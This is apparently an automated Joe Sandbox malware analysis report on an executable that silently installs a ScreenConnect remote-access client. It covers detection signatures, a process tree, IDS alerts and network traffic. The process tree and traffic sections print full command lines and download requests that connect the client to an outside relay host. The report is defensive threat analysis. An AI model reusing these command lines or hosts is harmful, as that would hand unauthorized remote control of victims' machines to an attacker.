Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
khwHsyfsJ1.exe

Overview

General Information

Sample name:khwHsyfsJ1.exe
renamed because original name is a hash value
Original sample name:89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f.exe
Analysis ID:1542314
MD5:24686214dadbe686482fb77f11010df4
SHA1:f8c830e878b6f1d5ab63181fec3dbf4fc91f2442
SHA256:89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f
Tags:exesecure-stansup-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:20
Range:0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • khwHsyfsJ1.exe (PID: 652 cmdline: "C:\Users\user\Desktop\khwHsyfsJ1.exe" MD5: 24686214DADBE686482FB77F11010DF4)
    • dfsvc.exe (PID: 1556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4844 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1832 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2052 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 2776 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 5656 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: dfsvc.exe PID: 1556JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.a30000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49707, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 1556, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1832, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T19:27:26.008060+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949723TCP
                  2024-10-25T19:27:28.069326+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949724TCP
                  2024-10-25T19:27:33.135465+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949729TCP
                  2024-10-25T19:27:34.929479+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949730TCP
                  2024-10-25T19:27:37.335418+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949731TCP
                  2024-10-25T19:27:43.062116+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949732TCP
                  2024-10-25T19:27:44.630172+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949733TCP
                  2024-10-25T19:27:48.243602+020020098971A Network Trojan was detected79.110.49.185443192.168.2.949734TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: khwHsyfsJ1.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.7% probability
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior

                  Compliance

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5530000.0.unpack
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Uses 32bit PE files
                  Source: khwHsyfsJ1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: khwHsyfsJ1.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49733 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: khwHsyfsJ1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: khwHsyfsJ1.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBFC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1825684879.0000000000FED000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBF8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829558136.00000000055E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B64A4B FindFirstFileExA,0_2_00B64A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.9:49736 -> 79.110.49.185:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49724
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49723
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49730
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49731
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49729
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49733
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49732
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.9:49734
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
